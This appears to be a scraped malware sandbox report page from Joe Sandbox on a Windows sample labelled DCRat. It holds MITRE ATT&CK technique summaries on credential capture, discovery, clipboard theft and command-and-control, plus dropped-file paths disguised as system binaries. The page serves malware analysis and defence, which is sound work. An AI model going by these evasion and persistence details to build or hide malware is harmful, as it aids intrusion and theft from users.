Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ogVinh0jhq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ITlIQtTGhEyfMRHaLp.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ogVinh0jhq.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\5c0c0fd393ef30

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\9e8d7a4ca61bd9

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\4cKLiMk5Zo

C:\Users\user\AppData\Local\Temp\5b5j5nVkAZ

Windows Analysis Report
ogVinh0jhq.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre